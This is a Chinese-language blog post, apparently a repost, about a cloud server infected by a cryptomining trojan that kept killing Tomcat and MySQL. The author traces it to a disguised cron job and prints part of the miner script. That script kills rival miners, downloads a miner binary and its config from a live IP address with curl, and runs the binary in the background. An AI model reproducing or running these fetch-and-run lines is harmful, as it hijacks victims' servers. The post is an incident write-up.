服務器被植入木馬，CPU飆升200%-有解無憂

作者：我叫劉半仙
https://my.oschina.net/liughDevelop/blog/1786631

線上服務器用的是某云的，歡快的完美運行著Tomcat，MySQL，MongoDB，ActiveMQ等程式，突然一則噩耗從前線傳來：網站不能訪問了！

此專案是我負責，我以150+的手速立即打開了服務器，看到Tomcat掛了，然后順其自然的重啟，啟動程序中直接被killed，再試試資料庫，同樣沒成功

多次嘗試甚至重啟機器無果，機智的我打了個top，出現以下內容：

這是誰運行的程式？

不管三七二十一先殺掉再說，因為它就是Tomcat等程式啟動不了的元兇，然而并沒有什么卵用，過一會再看那個東西又跑出來占cpu，推薦閱讀：Linux 最常用命令整理，建議收藏，

懷疑是個定時任務：

什么鬼，是個圖片？立即訪問了一下：

好尷尬，但是心思細膩的我早知道沒這么簡單，肯定只是偽裝，curl過去是下面的腳本，程序就是在挖礦：

#!/bin/sh
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 jva
pkill -f ./atd
pkill -f /tmp/wa/httpd.conf
pkill -f 108.61.186.224
pkill -f 128.199.86.57
pkill -f 67.231.243.10
pkill -f 142.4.124.164
pkill -f 192.99.56.117
pkill -f 45.76.102.45
pkill -f AnXqV.yam
pkill -f BI5zj
pkill -f Carbon
pkill -f Duck.sh
pkill -f Guard.sh
...中間省略
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://192.99.142.235:8220/1.json
curl -o /var/tmp/suppoie http://192.99.142.235:8220/rig1
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
sleep 3
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://192.99.142.235:8220/1.json
curl -o /var/tmp/suppoie http://192.99.142.235:8220/rig2
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."

有興趣的同學想查看以上完整源代碼，命令列運行下面指令（不分作業系統，方便安全無污染）：